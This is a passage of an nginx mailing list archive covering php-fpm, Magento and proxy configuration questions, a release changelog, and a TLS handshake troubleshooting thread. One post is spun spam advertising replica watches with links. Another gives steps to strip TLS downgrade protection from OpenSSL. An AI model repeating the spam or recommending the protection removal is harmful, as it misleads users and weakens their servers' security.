proxy_read_timeout 5s; } } # nginx version nginx version: nginx/1.6.2 # AWS linux version NAME="Amazon Linux AMI" VERSION="2015.03" ID="amzn" ID_LIKE="rhel fedora" VERSION_ID="2015.03" PRETTY_NAME="Amazon Linux AMI 2015.03" ANSI_COLOR="0;33" CPE_NAME="cpe:/o:amazon:linux:2015.03:ga" HOME_URL="http://aws.amazon.com/amazon-linux-ami/" Amazon Linux AMI release 2015.03 # kernel version Linux ip-172-31-12-138 3.14.42-31.38.amzn1.x86_64 #1 SMP Wed May 13 20:33:05 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260257,260257#msg-260257 From nginx-forum at nginx.us Mon Jul 13 19:14:58 2015 From: nginx-forum at nginx.us (adjc98) Date: Mon, 13 Jul 2015 15:14:58 -0400 Subject: New to nginx question about php-fpm Message-ID: <9da828a60431717c96f26bbbc31983f4.NginxMailingListEnglish@forum.nginx.org> I am new to nginx and had a question about php-fpm. It seems that php-fpm is being restarted at random times. I am not sure what is causing the restart, but when it does I am getting this in the php-fpm.log [12-Jul-2015 00:52:29] ERROR: An another FPM instance seems to already listen on /opt/pifpm/fpmsockets/5.5.11.sock [12-Jul-2015 00:52:29] ERROR: FPM initialization failed I am assuming that the error is happening because the FPM processes are not being shut down correctly? I am not sure how to find what is calling the FPM restart. Do you have any suggestions on how to find the initial restart call and how I can make it restart smoothly? The server is a centos server with cpanel. I have not been able to locate the php-fpm.conf or the nginx.conf on my server. I know you need more info than this, so please point me in the right direction. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260260,260260#msg-260260 From nginx-forum at nginx.us Mon Jul 13 19:17:07 2015 From: nginx-forum at nginx.us (adjc98) Date: Mon, 13 Jul 2015 15:17:07 -0400 Subject: New to nginx question about php-fpm In-Reply-To: <9da828a60431717c96f26bbbc31983f4.NginxMailingListEnglish@forum.nginx.org> References: <9da828a60431717c96f26bbbc31983f4.NginxMailingListEnglish@forum.nginx.org> Message-ID: <88f9ded9435ec468381b8e8b14d45a94.NginxMailingListEnglish@forum.nginx.org> Found nginx conf: server { listen 184.154.39.58:80 default_server; server_name _; access_log off; location / { proxy_send_timeout 90; proxy_read_timeout 90; proxy_buffer_size 4k; proxy_buffers 16 32k; proxy_busy_buffers_size 64k; proxy_temp_file_write_size 64k; proxy_connect_timeout 30s; proxy_redirect http://184.154.39.58:9999 http://CPANELIP; proxy_pass http://184.154.39.58:9999; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; } } Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260260,260261#msg-260261 From nginx-forum at nginx.us Mon Jul 13 22:03:52 2015 From: nginx-forum at nginx.us (J_12) Date: Mon, 13 Jul 2015 18:03:52 -0400 Subject: Nginx Magento multistore configuration Message-ID: There is a website that has multiple subcatogories which are stores in magento: www.website.com/sub1 www.website.com/sub2 www.website.com/sub3 The server used is ngnix. everything is set up. And used to work, the nginx conf file for this site need to be reconstructed. at the moment when for example www.website.com/sub1 is requested this wil set the store to store to sub1. which works fine. However when a product is asked i.e. www.website.com/sub1/product this returned a "page not found" error. If the store is set to sub1 the url www.website.com/product DOES FIND the product without any issues. on the other hand f the store was not set previously, www.website.com/product DID NOT FIND the product. it seemed that once a store is set the following happens e.g. www.website.com/sub1/product : sub1->sub1->product == error (because of sub1->sub1) this should be: sub1->product. note that setting the store when www.website.com/sub1/product is requested and then redirecting the site to www.website.com/product is not an option. everything used to work fine! The store setup had not been changed. only the the nginx conf file should be adjusted. any sugestions? to be more specific: in the root folder there is an index.php file were magento is set to run the website via mage run code. In the root folder there are subfolders one for each store. these folders each contain an index.php file were the store is set. any more info needed? Any help would be appreciated. additional info: in the root folder there is an index.php file were magento is set to run the website via mage run code. In the root folder there are subfolders: one for each store. These folders each contain an index.php file were the store is set( again via mage run code) (the stores are being set correctly in these files). the nginx conf looked like this: server { listen 80 default; server_name website.com; root /www_folder; client_max_body_size 10M; location / { index index.php; try_files $uri $uri/ @handler; expires 30d; } location /mage/ { try_files $uri $uri/ @magehandler; expires 30d; } location @handler { ## Remove trailing slash rewrite ^/(.*)/$ /$1 permanent; ## Magento uses a common front handler rewrite / /index.php; } location @magehandler { ## Adds a trailing slash to any urls that is missing a trailing slash rewrite ^(.*[^/])$ $1/ permanent; ## Magento uses a common front handler rewrite /mage/ /mage/index.php; } ## These locations would be hidden by .htaccess normally, protected location ~ (/mage/(app/|includes/|lib/|pkginfo/|var/|errors/local.xml|shell/|tmp/|cron.+)|/\.git/|/\.ht.+) {deny all;} location ~* \.(js|css|png|jpg|jpeg|gif|ico)$ { expires max; log_not_found off; } location /. { ## Disable .htaccess and other hidden files return 404; } location ~ .php/ { rewrite ^(.*.php)/ $1 last; } location ~ \.php$ { add_header X-UA-Compatible 'IE=Edge,chrome=1'; try_files $uri =404; expires off; fastcgi_index index.php; fastcgi_pass unix:/var/run/php5-fpm.sock; #fastcgi_pass 127.0.0.1:9000; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; include /etc/nginx/fastcgi_params; fastcgi_param SERVER_PORT 80; fastcgi_param HTTPS $fastcgi_https; } } Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260265,260265#msg-260265 From steve at greengecko.co.nz Mon Jul 13 23:23:03 2015 From: steve at greengecko.co.nz (steve) Date: Tue, 14 Jul 2015 11:23:03 +1200 Subject: Nginx Magento multistore configuration In-Reply-To: References: Message-ID: <55A44857.2000808@greengecko.co.nz> I have a feeling that you may be taking the wrong approach... there is no need to use these subfolders for each storefront any more. Each separate storefront has an unique type / code pair, which needs to be passed to Magento to identify the site you're using. I find the simplest way to set it up is to map a couple of variables: Here's a completely untested example which should ensure that the right storefront is used... nothing else necessary map $request_uri $mage_type { default store; ~^/site1 website; ~^/site2 website; } map $request_uri $mage_code { default default; ~^/site1 site1; ~^/site2 site2; } And then your php block would be... location ~ \.php$ { add_header X-UA-Compatible 'IE=Edge,chrome=1'; try_files $uri =404; expires off; fastcgi_index index.php; fastcgi_pass unix:/var/run/php5-fpm.sock; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; include /etc/nginx/fastcgi_params; fastcgi_param SERVER_PORT 80; fastcgi_param HTTPS $fastcgi_https; fastcgi_param MAGE_RUN_CODE $mage_code; fastcgi_param MAGE_RUN_TYPE $mage_type; } On 14/07/15 10:03, J_12 wrote: > There is a website that has multiple subcatogories which are stores in > magento: > > www.website.com/sub1 www.website.com/sub2 www.website.com/sub3 > > The server used is ngnix. everything is set up. And used to work, the nginx > conf file for this site need to be reconstructed. > > at the moment when for example www.website.com/sub1 is requested this wil > set the store to store to sub1. which works fine. However when a product is > asked i.e. www.website.com/sub1/product this returned a "page not found" > error. > > If the store is set to sub1 the url www.website.com/product DOES FIND the > product without any issues. on the other hand f the store was not set > previously, www.website.com/product DID NOT FIND the product. > > it seemed that once a store is set the following happens e.g. > www.website.com/sub1/product : > > sub1->sub1->product == error (because of sub1->sub1) > > this should be: > > sub1->product. > > note that setting the store when www.website.com/sub1/product is requested > and then redirecting the site to www.website.com/product is not an option. > everything used to work fine! The store setup had not been changed. only the > the nginx conf file should be adjusted. any sugestions? > > to be more specific: in the root folder there is an index.php file were > magento is set to run the website via mage run code. In the root folder > there are subfolders one for each store. these folders each contain an > index.php file were the store is set. any more info needed? > > Any help would be appreciated. > > additional info: in the root folder there is an index.php file were magento > is set to run the website via mage run code. In the root folder there are > subfolders: one for each store. These folders each contain an index.php file > were the store is set( again via mage run code) (the stores are being set > correctly in these files). > > the nginx conf looked like this: > > > > > server { > > listen 80 default; > server_name website.com; > root /www_folder; > client_max_body_size 10M; > > location / { > index index.php; > try_files $uri $uri/ @handler; > expires 30d; > } > > > location /mage/ { > try_files $uri $uri/ @magehandler; > expires 30d; > } > > location @handler { > ## Remove trailing slash > rewrite ^/(.*)/$ /$1 permanent; > ## Magento uses a common front handler > rewrite / /index.php; > } > > location @magehandler { > ## Adds a trailing slash to any urls that is missing a trailing slash > rewrite ^(.*[^/])$ $1/ permanent; > ## Magento uses a common front handler > rewrite /mage/ /mage/index.php; > } > > > ## These locations would be hidden by .htaccess normally, protected > location ~ > (/mage/(app/|includes/|lib/|pkginfo/|var/|errors/local.xml|shell/|tmp/|cron.+)|/\.git/|/\.ht.+) > {deny all;} > > location ~* \.(js|css|png|jpg|jpeg|gif|ico)$ { > expires max; > log_not_found off; > } > > location /. { ## Disable .htaccess and other hidden files > return 404; > } > > location ~ .php/ { > rewrite ^(.*.php)/ $1 last; > } > > location ~ \.php$ { > add_header X-UA-Compatible 'IE=Edge,chrome=1'; > try_files $uri =404; > expires off; > fastcgi_index index.php; > fastcgi_pass unix:/var/run/php5-fpm.sock; > #fastcgi_pass 127.0.0.1:9000; > fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; > include /etc/nginx/fastcgi_params; > fastcgi_param SERVER_PORT 80; > fastcgi_param HTTPS $fastcgi_https; > } > } > > Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260265,260265#msg-260265 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx -- Steve Holdoway BSc(Hons) MIITP http://www.greengecko.co.nz Linkedin: http://www.linkedin.com/in/steveholdoway Skype: sholdowa From anoopalias01 at gmail.com Tue Jul 14 00:08:14 2015 From: anoopalias01 at gmail.com (Anoop Alias) Date: Tue, 14 Jul 2015 05:38:14 +0530 Subject: New to nginx question about php-fpm In-Reply-To: <88f9ded9435ec468381b8e8b14d45a94.NginxMailingListEnglish@forum.nginx.org> References: <9da828a60431717c96f26bbbc31983f4.NginxMailingListEnglish@forum.nginx.org> <88f9ded9435ec468381b8e8b14d45a94.NginxMailingListEnglish@forum.nginx.org> Message-ID: Looks like you are using the cpXstack cpanel plugin. Please read https://support.sysally.net/projects/ndeploy/wiki/CpXstack_and_cpHstack_users_read_this -- *Anoop P Alias* -------------- next part -------------- An HTML attachment was scrubbed... URL: From lists at ruby-forum.com Tue Jul 14 03:14:56 2015 From: lists at ruby-forum.com (Hutobenly Kadiny) Date: Tue, 14 Jul 2015 05:14:56 +0200 Subject: keepalive_timeout, proxy_send_timeout, and proxy_read_timeout ignored In-Reply-To: References: Message-ID: <3f48b076e2568a91ba0568032945cfea@ruby-forum.com> In modern times, with all the marketplace increasing countless design renovations, wrist watches can be around appropriate downloads on the genuine. How come primarily near, it's possible to think about. Considering that entire concept of watches would be to create a reasonably priced products, a solution which can be appreciated through just about all see fanciers, not only through the loaded handful of. Thinking that signifies that gold and silver coins which include jewelry or possibly platinum eagle are superceded by using the highest quality chrome steel. Other than in which, all kinds of things through manufactured along with the greatest attention, in order to make each individual start looking, believe and additionally deliver the results enjoy it has the real comparable version. The simple truth is lots of webpages merchandising looks after since they are promoting very well. The reason might these distribute which means that nicely in the event top quality has been a major problem? Precisely why would most likely individuals continuously revisit get a great deal more any time displeased with each other? The challenge in fact is which should you not may well decline a few fantastic thousand $ $ $ $, or perhaps tons of for an addition, wristwatches would be the perfect substitute for you personally. Together with actually, regardless if My partner and i which usually sort of income to shell out, I had created get unlikely to try it again. Exactly why invest 12 or maybe hundred dollars days more about something which is definitely plainly cost-effective? An existing close friend of excavation as a result of secondary education just got their self a watch, given that exactly what greater observe comes improved with other individuals? Sure, my super cool buddy Charles is rather successful. She appeared to be boasting very much together with his cutting edge order, on the subject of the point that it will be a real confined element etc ., that we thought i would model your ex boyfriend in addition to When i dictated a watch intended for by myself, since i won't be able to afford the first. http://www.attrinity.com http://www.watchesbuy.co.uk http://www.waxwatchreplicas.co.uk -- Posted via http://www.ruby-forum.com/. From vbart at nginx.com Tue Jul 14 13:23:47 2015 From: vbart at nginx.com (Valentin V. Bartenev) Date: Tue, 14 Jul 2015 16:23:47 +0300 Subject: Dropped https client connection doesn't drop backend proxy_pass connection In-Reply-To: <0982748dea8239b15a3fb341057c5c2d.NginxMailingListEnglish@forum.nginx.org> References: <1363321351.3854.140661204587653.70CC51E2@webmail.messagingengine.com> <0982748dea8239b15a3fb341057c5c2d.NginxMailingListEnglish@forum.nginx.org> Message-ID: <27112609.fgdjELvfcj@vbart-laptop> On Monday 13 July 2015 12:02:44 dgobaud wrote: > Any update on this? Seeing this problem with nginx leaving connections open > on AWS Beanstalk using nginx to proxy to puma/ruby on rails. [..] Do you have cache or proxy store configured? wbr, Valentin V. Bartenev From shay at peretz.in Tue Jul 14 13:49:46 2015 From: shay at peretz.in (Shay Peretz) Date: Tue, 14 Jul 2015 16:49:46 +0300 Subject: Nginx with Organization PROXY server Message-ID: Hello , on a linux box I define to move the traffic through some Centralize proxy server ( Organization one ) in order to configure the proxy from the command line I ran : export HTTP_PROXY="http://:" On the same box I have nginx which serve as a reverse proxy and all the local application sending the traffic through the local reverse proxy how can I force the nginx to fwd all the traffic through the ORG proxy server ? chart ... Linux Box Proxy server | Internet | |--------------------------------------------| => |---------------------------| => -> < nginx > Organization Proxy | | Thanks ! From nginx-forum at nginx.us Tue Jul 14 15:21:24 2015 From: nginx-forum at nginx.us (elianmarks) Date: Tue, 14 Jul 2015 11:21:24 -0400 Subject: Problem Nginx with SSL Settings active in IIS 7.5 Message-ID: <9db06eff069bab748a9f771ec8c87722.NginxMailingListEnglish@forum.nginx.org> I've got the following problem with nginx working with IIS, when enabled the client certificate in the SSL Settings solicitation IIS, it performs two SSL handshake, a first without requesting the certificate after this first handshake is done another handshake requesting the certificate. The operation is done as explained in this link: http://blogs.technet?ertificate-authentication.aspx When access the application through the nginx reverse is done only one handshake already requesting the certificate, resulting in no operation of the application. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260279,260279#msg-260279 From nginx-forum at nginx.us Tue Jul 14 15:22:06 2015 From: nginx-forum at nginx.us (elianmarks) Date: Tue, 14 Jul 2015 11:22:06 -0400 Subject: Problem Nginx with SSL Settings active in IIS 7.5 In-Reply-To: <9db06eff069bab748a9f771ec8c87722.NginxMailingListEnglish@forum.nginx.org> References: <9db06eff069bab748a9f771ec8c87722.NginxMailingListEnglish@forum.nginx.org> Message-ID: <630c8e6507a070dec4428c222d9989e8.NginxMailingListEnglish@forum.nginx.org> The correct link - http://blogs.technet.com/b/nettracer/archive/2013/12/30/how-it-works-on-the-wire-iis-http-client-certificate-authentication.aspx Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260279,260280#msg-260280 From nginx-forum at nginx.us Tue Jul 14 15:50:29 2015 From: nginx-forum at nginx.us (dgobaud) Date: Tue, 14 Jul 2015 11:50:29 -0400 Subject: Dropped https client connection doesn't drop backend proxy_pass connection In-Reply-To: <27112609.fgdjELvfcj@vbart-laptop> References: <27112609.fgdjELvfcj@vbart-laptop> Message-ID: <605cd2fb2b57858f88e1e75ed7deb80f.NginxMailingListEnglish@forum.nginx.org> Don't think so - config is below and the relevant url is /dashboard_stream upstream my_app { server unix:///var/run/puma/my_app.sock; } server { listen 80; server_name _ localhost; # need to listen to localhost for worker tier if ($http_x_forwarded_proto = "http") { return 301 https://$host$request_uri; } location / { proxy_pass http://my_app; # match the name of upstream directive which is defined above proxy_set_header Host $host; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; } location /dashboard_stream { proxy_pass http://my_app; # match the name of upstream directive which is defined above proxy_set_header Host $host; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_buffering off; proxy_cache off; proxy_http_version 1.1; } } Valentin V. Bartenev Wrote: ------------------------------------------------------- > On Monday 13 July 2015 12:02:44 dgobaud wrote: > > Any update on this? Seeing this problem with nginx leaving > connections open > > on AWS Beanstalk using nginx to proxy to puma/ruby on rails. > [..] > > Do you have cache or proxy store configured? > > wbr, Valentin V. Bartenev > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx Posted at Nginx Forum: http://forum.nginx.org/read.php?2,237386,260281#msg-260281 From nginx-forum at nginx.us Tue Jul 14 16:43:53 2015 From: nginx-forum at nginx.us (dgobaud) Date: Tue, 14 Jul 2015 12:43:53 -0400 Subject: Dropped https client connection doesn't drop backend proxy_pass connection In-Reply-To: <605cd2fb2b57858f88e1e75ed7deb80f.NginxMailingListEnglish@forum.nginx.org> References: <27112609.fgdjELvfcj@vbart-laptop> <605cd2fb2b57858f88e1e75ed7deb80f.NginxMailingListEnglish@forum.nginx.org> Message-ID: I also just tested regular http and it is having the same problem. dgobaud Wrote: ------------------------------------------------------- > Don't think so - config is below and the relevant url is > /dashboard_stream > > upstream my_app { > server unix:///var/run/puma/my_app.sock; > } > > server { > listen 80; > server_name _ localhost; # need to listen to localhost for > worker tier > > if ($http_x_forwarded_proto = "http") { return 301 > https://$host$request_uri; } > > location / { > proxy_pass http://my_app; # match the name of upstream > directive which is defined above > proxy_set_header Host $host; > proxy_set_header X-Forwarded-For > $proxy_add_x_forwarded_for; > } > > location /dashboard_stream { > proxy_pass http://my_app; # match the name of upstream > directive which is defined above > proxy_set_header Host $host; > proxy_set_header X-Forwarded-For > $proxy_add_x_forwarded_for; > proxy_buffering off; > proxy_cache off; > proxy_http_version 1.1; > } > } > > Valentin V. Bartenev Wrote: > ------------------------------------------------------- > > On Monday 13 July 2015 12:02:44 dgobaud wrote: > > > Any update on this? Seeing this problem with nginx leaving > > connections open > > > on AWS Beanstalk using nginx to proxy to puma/ruby on rails. > > [..] > > > > Do you have cache or proxy store configured? > > > > wbr, Valentin V. Bartenev > > > > _______________________________________________ > > nginx mailing list > > nginx at nginx.org > > http://mailman.nginx.org/mailman/listinfo/nginx Posted at Nginx Forum: http://forum.nginx.org/read.php?2,237386,260283#msg-260283 From mdounin at mdounin.ru Tue Jul 14 17:14:56 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 14 Jul 2015 20:14:56 +0300 Subject: nginx-1.9.3 Message-ID: <20150714171455.GS93501@mdounin.ru> Changes with nginx 1.9.3 14 Jul 2015 *) Change: duplicate "http", "mail", and "stream" blocks are now disallowed. *) Feature: connection limiting in the stream module. *) Feature: data rate limiting in the stream module. *) Bugfix: the "zone" directive inside the "upstream" block did not work on Windows. *) Bugfix: compatibility with LibreSSL in the stream module. Thanks to Piotr Sikora. *) Bugfix: in the "--builddir" configure parameter. Thanks to Piotr Sikora. *) Bugfix: the "ssl_stapling_file" directive did not work; the bug had appeared in 1.9.2. Thanks to Faidon Liambotis and Brandon Black. *) Bugfix: a segmentation fault might occur in a worker process if the "ssl_stapling" directive was used; the bug had appeared in 1.9.2. Thanks to Matthew Baldwin. -- Maxim Dounin http://nginx.org/ From kworthington at gmail.com Tue Jul 14 17:34:20 2015 From: kworthington at gmail.com (Kevin Worthington) Date: Tue, 14 Jul 2015 13:34:20 -0400 Subject: nginx-1.9.3 In-Reply-To: <20150714171455.GS93501@mdounin.ru> References: <20150714171455.GS93501@mdounin.ru> Message-ID: Hello Nginx users, Now available: Nginx 1.9.3 for Windows http://goo.gl/qn44F5 (32-bit and 64-bit versions) These versions are to support legacy users who are already using Cygwin based builds of Nginx. Officially supported native Windows binaries are at nginx.org. Announcements are also available here: Twitter http://twitter.com/kworthington Google+ https://plus.google.com/+KevinWorthington/ Thank you, Kevin -- Kevin Worthington kworthington *@* (gmail] [dot} {com) http://kevinworthington.com/ http://twitter.com/kworthington https://plus.google.com/+KevinWorthington/ On Tue, Jul 14, 2015 at 1:14 PM, Maxim Dounin wrote: > Changes with nginx 1.9.3 14 Jul > 2015 > > *) Change: duplicate "http", "mail", and "stream" blocks are now > disallowed. > > *) Feature: connection limiting in the stream module. > > *) Feature: data rate limiting in the stream module. > > *) Bugfix: the "zone" directive inside the "upstream" block did not > work > on Windows. > > *) Bugfix: compatibility with LibreSSL in the stream module. > Thanks to Piotr Sikora. > > *) Bugfix: in the "--builddir" configure parameter. > Thanks to Piotr Sikora. > > *) Bugfix: the "ssl_stapling_file" directive did not work; the bug had > appeared in 1.9.2. > Thanks to Faidon Liambotis and Brandon Black. > > *) Bugfix: a segmentation fault might occur in a worker process if the > "ssl_stapling" directive was used; the bug had appeared in 1.9.2. > Thanks to Matthew Baldwin. > > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Tue Jul 14 17:35:58 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 14 Jul 2015 20:35:58 +0300 Subject: Dropped https client connection doesn't drop backend proxy_pass connection In-Reply-To: References: <27112609.fgdjELvfcj@vbart-laptop> <605cd2fb2b57858f88e1e75ed7deb80f.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20150714173557.GX93501@mdounin.ru> Hello! On Tue, Jul 14, 2015 at 12:43:53PM -0400, dgobaud wrote: > I also just tested regular http and it is having the same problem. First of all, please clarify what's the problem you are seeing. That is, please provide details/stats/logs that show the problem. -- Maxim Dounin http://nginx.org/ From lists at ruby-forum.com Tue Jul 14 17:37:09 2015 From: lists at ruby-forum.com (Crystal Pellitier) Date: Tue, 14 Jul 2015 19:37:09 +0200 Subject: performance testing In-Reply-To: <270dad5267769b3270203fc7cd4bb348.NginxMailingListEnglish@forum.nginx.org> References: <270dad5267769b3270203fc7cd4bb348.NginxMailingListEnglish@forum.nginx.org> Message-ID: What is performance testing?what is the importance of it?Can a functional tester can do performance testing? -- Posted via http://www.ruby-forum.com/. From mdounin at mdounin.ru Tue Jul 14 19:12:35 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 14 Jul 2015 22:12:35 +0300 Subject: Nginx with Organization PROXY server In-Reply-To: References: Message-ID: <20150714191235.GY93501@mdounin.ru> Hello! On Tue, Jul 14, 2015 at 04:49:46PM +0300, Shay Peretz wrote: > Hello , > > on a linux box I define to move the traffic through some Centralize > proxy server ( Organization one ) > in order to configure the proxy from the command line I ran : > export HTTP_PROXY="http://:" > > On the same box I have nginx which serve as a reverse proxy and all > the local application sending the traffic through the local reverse > proxy > > > how can I force the nginx to fwd all the traffic through the ORG proxy server ? You can't. -- Maxim Dounin http://nginx.org/ From nginx-forum at nginx.us Tue Jul 14 19:30:11 2015 From: nginx-forum at nginx.us (shay.peretz@capriza.com) Date: Tue, 14 Jul 2015 15:30:11 -0400 Subject: Nginx with Organization PROXY server In-Reply-To: <20150714191235.GY93501@mdounin.ru> References: <20150714191235.GY93501@mdounin.ru> Message-ID: <3ad334445cd816349bd325851b28ccd9.NginxMailingListEnglish@forum.nginx.org> Any plan for supporting it ? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260278,260296#msg-260296 From mdounin at mdounin.ru Tue Jul 14 20:13:22 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 14 Jul 2015 23:13:22 +0300 Subject: Nginx with Organization PROXY server In-Reply-To: <3ad334445cd816349bd325851b28ccd9.NginxMailingListEnglish@forum.nginx.org> References: <20150714191235.GY93501@mdounin.ru> <3ad334445cd816349bd325851b28ccd9.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20150714201322.GZ93501@mdounin.ru> Hello! On Tue, Jul 14, 2015 at 03:30:11PM -0400, shay.peretz at capriza.com wrote: > Any plan for supporting it ? No. -- Maxim Dounin http://nginx.org/ From tekberg at uw.edu Tue Jul 14 20:47:01 2015 From: tekberg at uw.edu (Tom Ekberg) Date: Tue, 14 Jul 2015 13:47:01 -0700 (PDT) Subject: nginx for Postgres servers Message-ID: I know nginx is designed to handle web and mail servers. Does it make sense to use to handle multiple (in our case 2) PostgreSQL database servers? Tom Ekberg Senior Computer Specialist, Lab Medicine University of Washington Medical Center 1959 NE Pacific St, MS 357110 Seattle WA 98195 work: (206) 598-8544 email: tekberg at uw.edu From miguelmclara at gmail.com Tue Jul 14 21:52:11 2015 From: miguelmclara at gmail.com (Miguel Clara) Date: Tue, 14 Jul 2015 21:52:11 +0000 Subject: nginx for Postgres servers In-Reply-To: References: Message-ID: <38DF1F4A-3A70-4EC5-ADB3-766D919AD9E5@gmail.com> You mean something like: https://github.com/FRiCKLE/ngx_postgres ? On July 14, 2015 9:47:01 PM GMT+01:00, Tom Ekberg wrote: >I know nginx is designed to handle web and mail servers. Does it make >sense to use to handle multiple (in our case 2) PostgreSQL database >servers? > >Tom Ekberg >Senior Computer Specialist, Lab Medicine >University of Washington Medical Center >1959 NE Pacific St, MS 357110 >Seattle WA 98195 >work: (206) 598-8544 >email: tekberg at uw.edu > > >_______________________________________________ >nginx mailing list >nginx at nginx.org >http://mailman.nginx.org/mailman/listinfo/nginx -- Sent from my Android device with K-9 Mail. Please excuse my brevity. -------------- next part -------------- An HTML attachment was scrubbed... URL: From arut at nginx.com Tue Jul 14 23:54:10 2015 From: arut at nginx.com (Roman Arutyunyan) Date: Tue, 14 Jul 2015 16:54:10 -0700 Subject: nginx for Postgres servers In-Reply-To: References: Message-ID: Hello Tom, If you want to proxy PostgreSQL connections with nginx, you can use the stream (tcp) proxy for this. Obviously, it will not keep a persistent connection to the database server, but will open a new connection for each client. http://nginx.org/en/docs/stream/ngx_stream_core_module.html > On 14 Jul 2015, at 13:47, Tom Ekberg wrote: > > I know nginx is designed to handle web and mail servers. Does it make sense to use to handle multiple (in our case 2) PostgreSQL database servers? > > Tom Ekberg > Senior Computer Specialist, Lab Medicine > University of Washington Medical Center > 1959 NE Pacific St, MS 357110 > Seattle WA 98195 > work: (206) 598-8544 > email: tekberg at uw.edu > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -- Roman Arutyunyan From nginx-forum at nginx.us Wed Jul 15 01:46:58 2015 From: nginx-forum at nginx.us (justink101) Date: Tue, 14 Jul 2015 21:46:58 -0400 Subject: Storing $server_addr in a variable VS using it directly in location block Message-ID: <9eb5f803b00bc4479ae6ac5f6d73e5a2.NginxMailingListEnglish@forum.nginx.org> According to the documentation getting the value of $server_addr to set a response header makes a system call, and can impact performance negativelyset $ip $server_addr; server { location /health { add_header Backend $server_addr; return 200; } } Would the following be a better solution, and eliminate the system call on every request? server { set $ip $server_addr; location /health { add_header Backend $ip always; return 200; } } Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260304,260304#msg-260304 From nginx-forum at nginx.us Wed Jul 15 01:58:52 2015 From: nginx-forum at nginx.us (tempspace) Date: Tue, 14 Jul 2015 21:58:52 -0400 Subject: Intermittent SSL Handshake Errors In-Reply-To: References: Message-ID: <9bd243967b2103df4602fb43702e7722.NginxMailingListEnglish@forum.nginx.org> Here's what we've learned so far: The issue is related to a new security feature that blocks TLS Fallback, which is a client that connects with one version of TLS, then tries to downgrade the connection and connect with a lower TLS version.. It was a feature made in light of the Poodle SSL vulnerability in order to keep SSL secure. The problem is that many networking libraries still exhibit this behavior of downgrading TLS versions on purpose, which OpenSSL then blocks the connection. Specificially, the NSURLConnection class on iOS exhibits this behavior. NSURLSession, the latest iteration of this client, does not. The problem is, if you want to support iOS 6 still, you HAVE to use NSURLConnection. We decided to end support for iOS 6 because of this. NSURLConnection is also completely depracated in iOS 9, so if you want to support iOS 9, you'll have to upgrade your client library anyway. On Android, the same thing happened, but not as often and between different TLS versions. Switching to Square's Retrofit client for SSL purposes has worked really well for us. So, the real fix is to make sure you update your clients. If you're on a Debian wheezy box, you can make your own openssl package with the latest version, but with TLS_FALLBACK_SCSV support removed by following the directions below. Note, this is not recommended from a security perspective, but if your environment is broken, you need to do what you need to do. As long as SSL v3 is disabled, there's no big, active vulnerability in the wild that takes advantage of fallback at the moment. Setup dquilt as shown on https://www.debian.org/doc/manuals/maint-guide/modify.en.html Building Package: apt-get update ; apt-get source libssl1.0.0 cd openssl-1.0.1e dquilt pop Support-TLS_FALLBACK_SCSV dquilt delete Support-TLS_FALLBACK_SCSV dpkg-source --commit dpkg-buildpackage The debian packages will be one directory back. Make sure to install the libssl packages you created, not just openssl, and nginx will need a restart to use the new library, not just a reload. I hope this helps someone, we spent a good amount of time on this. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,256373,260305#msg-260305 From mandre at eso.org Wed Jul 15 07:48:50 2015 From: mandre at eso.org (Mathias Andre) Date: Wed, 15 Jul 2015 09:48:50 +0200 Subject: Lost connection after reading 2147479552 bytes with sendfile In-Reply-To: <20150711224348.GA93501@mdounin.ru> References: <20150710160130.GB16679@eso.org> <20150711224348.GA93501@mdounin.ru> Message-ID: <20150715074850.GY17354@eso.org> Hi, Thanks for the detailed reply! * Maxim Dounin wrote: > The 2147479552 is a limit applied by default to allow sendfile() > to work with larger files on Linux up to 2.6.16 (see > src/os/unix/ngx_linux_sendfile_chain.c for some comments). You can see the > same limit on the first sendfile() call in the Ubuntu log as well. Indeed, I had also seen a lot of reference to this "magic" number around, so I thought it might be related to it. > The strange thing here is that on Scientific Linux 6 the call > pretends it send all the bytes in a single non-blocking call. > This is not nginx expects to ever happen, and this is what causes > the problem to appear. It would be interesting to dig further to > understand what causes this SL6 behaviour. OK, I did write a tiny test program to try and reproduce the problem on the SL box: it tries to copy 4GB from an existing file in one sendfile call: https://gist.github.com/mathiasuk/cf46d0f0caf1dd597e59 As expected the sendfile calls return 2147479552, and the output file is indeed 2147479552 bytes long, so this seems to work. Here's the trace: https://gist.github.com/mathiasuk/694177cf6446428f9498 I wonder if this could be because my test uses an output file and not a socket. I'll try and investigate some more. > Using sendfile_max_chunk with some large value is a correct > workaround and expected to work fine. Thanks! Mathias From nginx-forum at nginx.us Wed Jul 15 11:04:50 2015 From: nginx-forum at nginx.us (dgobaud) Date: Wed, 15 Jul 2015 07:04:50 -0400 Subject: Dropped https client connection doesn't drop backend proxy_pass connection In-Reply-To: <20150714173557.GX93501@mdounin.ru> References: 